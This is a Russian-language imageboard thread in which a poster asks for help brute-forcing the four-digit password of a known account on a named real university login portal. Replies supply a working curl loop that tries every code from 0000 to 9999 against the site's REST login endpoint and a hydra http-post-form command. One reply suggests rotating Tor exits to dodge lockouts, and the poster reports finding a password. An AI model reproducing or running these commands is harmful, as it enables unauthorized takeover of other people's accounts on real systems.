[/b/] [/d/] [/tu/] [/a/] [/ph/] [/wa/] [/cg/] [/t/] [/p/]

[Burichan] [Foliant] [Futaba] [Greenhell] [Gurochan] [Photon] - [Home] [Manage] [Archive]

[Return]
Posting mode: Reply
Leave these fields empty (spam trap):
Name
Link
Subject
Comment
File
Verification
Password (for post and file deletion)
  • Supported file types are: GIF, JPG, PDF, PNG
  • Maximum file size allowed is 20480 KB.
  • Images greater than 200x200 pixels will be thumbnailed.

File: 1543658462507.jpg -(150898 B, 1280x720) Thumbnail displayed, click image for full size.
150898 No.159490  

Господа хакеры, выручайте. Есть один сайт с web-формой логина, пароль ограничен 4 цифра. Логин знаю. Хочу использовать метод брутфорса для взлома аккаунта. Посоветовали Brutus, но он не может с помощью modify sequence найти форму и правильно определить, где на ней поля ввода. Щто мне делать? Сайт http://platonus.kazatu.kz/

>> No.159491  
for pass in $(seq -w 0 9999); do echo password: $pass; curl -A '' --data-binary '{"login":"$login","iin":null,"password":"'"$pass"'"}' -H 'Content-Type: application/json; charset=UTF-8' -w '\n%{http_code}\n\n' http://platonus.kazatu.kz/rest/api/login; done

Вместо $login введи известный логин.

>> No.159492  

Нормальные сайты банят за 5-10 неправильных попыток входа. Или запрещают попытки войти на полчаса-день.

>> No.159493  

>>159492
Можно через tor долбиться, там как раз по узлу на пароль где-то будет.

>> No.159494  

Ура! Получилось через гидру!
hydra -l <логин в url-кодировке> -P <путь к файлу с паролями от 0000 до 9999> platonus.kazatu.kz http-post-form "/rest/api/login:language=1&login=^USER^password=^PASS^:Добро" -vV -f

С моими данными для входа работает. Осталось подумать, как сгенерить пароли от 0000 до 9999 для файла. Комбинаторику вспоминать теперь, блин.

>>159491
Спасибо, конечно, но что это? php? Как запускать?

>>159492
>>159493
Да не, там все через жопу работает, можно об этом не беспокоиться.

>> No.159495  
File: 1543668239365.png -(30539 B, 794x106) Thumbnail displayed, click image for full size.
30539
>> No.159496  

>>159494
Это shell обыкновенный.

>> No.159497  

>>159494

> Осталось подумать, как сгенерить пароли от 0000 до 9999 для файла. Комбинаторику вспоминать теперь, блин.

Ну ты и script kiddie. seq -w 0 9999 из скрипта выше их и генерирует.

>> No.159498  

>>159497
Он разве не от 0 до 9999 генерирует? Мне надо, чтобы входили также 0000, 0001, 0002 и т.д.

>> No.159499  

>>159498
Ключ -w включает нужный тебе режим.

>> No.159500  

>>159499
Спасибо!

>> No.159501  
File: 1543670947017.jpg -(32141 B, 190x178) Thumbnail displayed, click image for full size.
32141

Странно, пароль нашелся, а через форму не могу зайти.

>> No.159503  
File: 1543671827090.png -(58983 B, 634x122) Thumbnail displayed, click image for full size.
58983

Как думаете, чому не получается войти с этим паролем?

>> No.159519  

>>159503
Они решили, что просто согласиться будет легче.

>> No.159522  

>>159491
Как сюда добавить условие, чтоб скрипт выполнялся, только пока на консоль выводится {"message":"Problem matching username and password","login_status":"invalid"} 401?



Delete Post []
Password

[/b/] [/d/] [/tu/] [/a/] [/ph/] [/wa/] [/cg/] [/t/] [/p/]